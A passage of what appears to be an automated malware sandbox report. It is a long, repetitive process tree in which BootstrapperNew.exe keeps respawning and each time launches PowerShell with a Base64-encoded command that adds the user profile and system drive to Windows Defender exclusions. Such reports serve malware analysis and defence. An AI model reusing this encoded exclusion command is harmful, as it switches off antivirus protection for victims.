        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        102⤵
        
        PID:7972
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        102⤵
        
        PID:5548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        103⤵
        
        PID:4224
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        103⤵
        
        PID:3504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        104⤵
        
        PID:4396
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        104⤵
        
        PID:2904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        105⤵
        
        PID:1172
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        105⤵
        
        PID:7344
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        106⤵
        
        PID:7468
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        106⤵
        
        PID:5356
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        107⤵
        
        PID:5988
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        107⤵
        
        PID:4896
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        108⤵
        
        PID:6680
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        108⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:5852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        109⤵
        
        PID:5728
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        109⤵
        Checks computer location settings
        
        PID:3460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        110⤵
        
        PID:7324
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        110⤵
        
        PID:1544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        111⤵
        
        PID:8028
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        111⤵
        Drops file in Windows directory
        
        PID:7708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        112⤵
        
        PID:5548
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        112⤵
        
        PID:6996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        113⤵
        
        PID:4236
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        113⤵
        
        PID:3500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        114⤵
        
        PID:7700
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        114⤵
        Drops file in Windows directory
        
        PID:4468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        115⤵
        
        PID:5536
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        115⤵
        
        PID:6488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        116⤵
        
        PID:7608
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        116⤵
        
        PID:4640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        117⤵
        
        PID:4452
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        117⤵
        
        PID:6044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        118⤵
        
        PID:6240
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        118⤵
        
        PID:2580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        119⤵
        
        PID:3540
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        119⤵
        
        PID:8160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        120⤵
        
        PID:6968
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        120⤵
        
        PID:7464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        121⤵
        
        PID:5940
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        121⤵
        Checks computer location settings
        
        PID:3688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        122⤵
        System Location Discovery: System Language Discovery
        
        PID:5524
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        122⤵
        
        PID:1364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        123⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        123⤵
        
        PID:5772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        124⤵
        
        PID:6568
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        124⤵
        
        PID:2756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        125⤵
        
        PID:7828
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        125⤵
        Drops file in Windows directory
        
        PID:5240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        126⤵
        
        PID:6160
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        126⤵
        
        PID:7116
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        127⤵
        
        PID:5820
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        127⤵
        Checks computer location settings
        
        PID:2024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        128⤵
        
        PID:7268
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        128⤵
        
        PID:5752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        129⤵
        
        PID:6472
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        129⤵
        
        PID:5412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        130⤵
        
        PID:3244
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        130⤵
        
        PID:5400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        131⤵
        
        PID:4120
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        131⤵
        
        PID:3624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        132⤵
        
        PID:1504
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        132⤵
        Checks computer location settings
        
        PID:7112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        133⤵
        
        PID:5884
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        133⤵
        
        PID:5932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
